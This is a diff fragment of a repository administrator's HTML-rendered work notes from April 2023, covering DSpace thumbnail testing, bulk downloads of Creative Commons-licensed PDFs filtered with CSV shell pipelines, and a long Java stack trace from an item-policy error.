+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> Image(filename<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;data/10568-103447.pdf[0]&#39;</span>, resolution<span style="color:#f92672">=</span><span style="color:#ae81ff">144</span>) <span style="color:#66d9ef">as</span> first_page:
+</span></span><span style="display:flex;"><span>    print(first_page<span style="color:#f92672">.</span>height)
+</span></span></code></pre></div><ul>
+<li>I spent more time re-working my thumbnail scripts to compare the resized images and other minor changes
+<ul>
+<li>I am realizing that doing the thumbnails directly from the source improves the ssimulacra2 score by 1-3% points compared to DSpace&rsquo;s method of creating a lossy supersample followed by a lossy resized thumbnail</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-04-03">2023-04-03</h2>
+<ul>
+<li>The harvest on AReS that I started yesterday never finished, and actually seems to have died&hellip;
+<ul>
+<li>Also, Fabio and Patrizio from Alliance emailed me to ask if there is something wrong with the REST API because they are having problems</li>
+<li>I stopped the harvest and started the plugins to get the remaining items via the sitemap&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-04-04">2023-04-04</h2>
+<ul>
+<li>Presentation about CGSpace metadata, controlled vocabularies, and curation to Pooja&rsquo;s communications and development team at UNEP
+<ul>
+<li>I uploaded the presentation to CGSpace here: <a href="https://hdl.handle.net/10568/129896">https://hdl.handle.net/10568/129896</a></li>
+</ul>
+</li>
+<li>Someone from the system organization contacted me to ask how to download a few thousand PDFs from a spreadsheet with DOIs and Handles</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c Handle ~/Downloads/2023-04-04-Donald.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    | sed \
+</span></span><span style="display:flex;"><span>        -e 1d \
+</span></span><span style="display:flex;"><span>        -e &#39;s_https://hdl.handle.net/__&#39; \
+</span></span><span style="display:flex;"><span>        -e &#39;s_https://cgspace.cgiar.org/handle/__&#39; \
+</span></span><span style="display:flex;"><span>        -e &#39;s_http://hdl.handle.net/__&#39; \
+</span></span><span style="display:flex;"><span>    | sort -u &gt; /tmp/handles.txt
+</span></span></code></pre></div><ul>
+<li>Then I used the <code>get_dspace_pdfs.py</code> script to download them</li>
+</ul>
+<h2 id="2023-04-05">2023-04-05</h2>
+<ul>
+<li>After some cleanup on Donald&rsquo;s DOIs I started the <code>get_scihub_pdfs.py</code> script</li>
+</ul>
+<h2 id="2023-04-06">2023-04-06</h2>
+<ul>
+<li>I did some more work to cleanup and streamline my next generation of DSpace thumbnail testing scripts
+<ul>
+<li>I think I found a bug in ImageMagick 7.1.1.5 where CMYK to sRGB conversion fails if we use image operations like <code>-density</code> or <code>-define</code> before reading the input file</li>
+<li>I started <a href="https://github.com/ImageMagick/ImageMagick/discussions/6234">a discussion on the ImageMagick GitHub</a> to ask</li>
+</ul>
+</li>
+<li>Yesterday I started downloading the rest of the PDFs from Donald, those that had DOIs
+<ul>
+<li>As a measure of caution, I extracted the list of DOIs and used my <code>crossref_doi_lookup.py</code> script to get their licenses from Crossref:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/crossref_doi_lookup.py -e xxxx@i.org -i /tmp/dois.txt -o /tmp/donald-crossref-dois.csv -d
+</span></span></code></pre></div><ul>
+<li>Then I did some CSV manipulation to extract the DOIs that were Creative Commons licensed, excluding any that were &ldquo;No Derivatives&rdquo;, and re-formatting the DOIs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c doi,license /tmp/donald-crossref-dois.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvgrep -c license -m &#39;creativecommons&#39; \
+</span></span><span style="display:flex;"><span>  | csvgrep -c license -i -r &#39;by-(nd|nc-nd)&#39; \
+</span></span><span style="display:flex;"><span>  | sed -e &#39;s_^10_https://doi.org/10_&#39; \
+</span></span><span style="display:flex;"><span>    -e &#39;s/\(am\|tdm\|unspecified\|vor\): //&#39; \
+</span></span><span style="display:flex;"><span>  | tee /tmp/donald-open-dois.csv \
+</span></span><span style="display:flex;"><span>  | wc -l
+</span></span><span style="display:flex;"><span>4268
+</span></span></code></pre></div><ul>
+<li>From those I filtered for the DOIs for which I had downloaded PDFs, in the <code>filename</code> column of the Sci-Hub script and copied them to a separate directory:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in <span style="color:#66d9ef">$(</span>csvjoin -c doi /tmp/donald-doi-pdfs.csv /tmp/donald-open-dois.csv | csvgrep -c filename -i -r <span style="color:#e6db74">&#39;^$&#39;</span> | csvcut -c filename | sed 1d<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> cp --reflink<span style="color:#f92672">=</span>always <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;creative-commons-licensed/</span>$file<span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">done</span>
+</span></span></code></pre></div><ul>
+<li>I used BTRFS copy-on-write via reflinks to make sure I didn&rsquo;t duplicate the files :-D</li>
+<li>I ran out of time and had to stop the process around 3,127 PDFs
+<ul>
+<li>I zipped them up and sent them to the others, along with a CSV of the DOIs, PDF filenames, and licenses</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-04-17">2023-04-17</h2>
+<ul>
+<li>Abenet noticed a weird issue with <a href="https://cgspace.cgiar.org/handle/10568/75611">this item</a>
+<ul>
+<li>The item has metadata, but the page is blank</li>
+<li>When I try to edit the item&rsquo;s authorization policies in XMLUI I get a nullPointerException:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Java stacktrace: java.lang.NullPointerException
+	at org.dspace.app.xmlui.aspect.administrative.authorization.EditItemPolicies.addBody(EditItemPolicies.java:166)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:234)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy201.startElement(Unknown Source)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.components.sax.AbstractXMLByteStreamInterpreter.parse(AbstractXMLByteStreamInterpreter.java:117)
+	at org.apache.cocoon.components.sax.XMLByteStreamInterpreter.deserialize(XMLByteStreamInterpreter.java:44)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:324)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:439)
+	at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+	at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+	at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+	at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+	at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+	at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+	at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
